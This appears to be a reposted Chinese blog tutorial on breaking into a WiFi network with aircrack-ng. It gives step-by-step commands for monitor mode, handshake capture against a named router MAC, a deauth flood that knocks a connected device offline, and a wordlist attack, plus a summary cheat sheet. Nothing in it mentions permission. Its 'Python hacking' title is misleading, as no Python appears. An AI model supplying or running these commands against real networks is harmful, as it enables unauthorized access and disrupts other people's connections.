超強python黑客技術,aircrack-ng突破 wifi 密碼!

開始前,先連上無線網卡,因為虛擬機中的kali系統不用調用筆記本自帶的無線網卡,所以需要一個外接無線網卡,然後接入kali系統。(私信小編007獲取大量Python學習資料!)

超強python黑客技術,aircrack-ng突破 wifi 密碼!

輸入 ifconfig -a 查看網卡,多了個 wlan0,說明網卡已經適配好,不然可能是驅動有問題。

超強python黑客技術,aircrack-ng突破 wifi 密碼!

開啟monitor模式,這裡有些進程會影響到monitor模式的開啟,如果開啟成功可忽略,不然就依提示操作。

超強python黑客技術,aircrack-ng突破 wifi 密碼!

按提示操作的結果:

超強python黑客技術,aircrack-ng突破 wifi 密碼!

監聽網絡,完了 Ctrl+C 退出。

超強python黑客技術,aircrack-ng突破 wifi 密碼!

主要參數說明:

#BSSID :路由器、AP的MAC地址

# PWR :信號強度,一看就是越小越強了

# #Data :傳輸的數據大小,大的可能在下載或看視頻什麼的

# CH :無線信道,要看準

# ENC :加密協議,自WPA2協議爆出重大安全漏洞,現已經出WPA3,坐等更新

# ESSID :這個就不用多說了,wifi名稱,有中文可能會出現亂碼哈

3. 目標有了,開始對其進行cap包的監聽和獲取,這裡要讓其中連接的設備重連才能抓包其握手包,可以慢慢等待,也可以使用deauth洪水攻擊。

root@huan:~#airodump-ng -c 9 --bssid 78:11:DC:10:4F:66 -w /root/桌面/wuxianpj/handshake/wlan0mon

// -w 後面的路徑是存放握手包的

超強python黑客技術,aircrack-ng突破 wifi 密碼!

4. 另起窗口,我們用deauth洪水攻擊,讓其中的一臺設備掉線,它掉線後會自動連接(除非別人在wifi設置中勾選掉了自動連接)

root@huan:~#aireplay-ng -0 20 -c 6C:88:14:F2:47:8C -a 78:11:DC:10:4F:66 wlan0mon

// -0 death模式,20為攻擊次數,也可以設為0,就是一直攻擊

// -c 這裡自然就是連接上的某臺設備的MAC地址了,指定它,我們讓它穩穩地掉線。

超強python黑客技術,aircrack-ng突破 wifi 密碼!

5. 看圖,不廢話

超強python黑客技術,aircrack-ng突破 wifi 密碼!

6. 話不多說,上字典(關鍵東西),讓它慢慢破去吧

root@huan:~#aircrack-ng -w /root/桌面/wuxianpj/zidian/wordlist.txt /root/桌面/wuxianpj/handshake/-02.cap

超強python黑客技術,aircrack-ng突破 wifi 密碼!

7. 沒錯下一步操作,退出monitor模式,別忘了喔

超強python黑客技術,aircrack-ng突破 wifi 密碼!

aircrack-ng 爆破wifi密碼 - 命令清單

~#airmon-ng start [網卡] //開啟monitor模式

~#airodump-ng [網卡] //捕獲附件的wifi信息

~#airodump-ng -c [信道]--bssid [路由器MAC] -w [handshake-path] [網卡]

~#aireplay-ng -0 [攻擊次數值] -c [某連接設備MAC] -a [路由器MAC] [網卡]

~#aircrack-ng -w [字典-path] [破解的目標握手包-path]

~#airmon-ng stop [網卡] //退出monitor模式


分享到:


相關文章: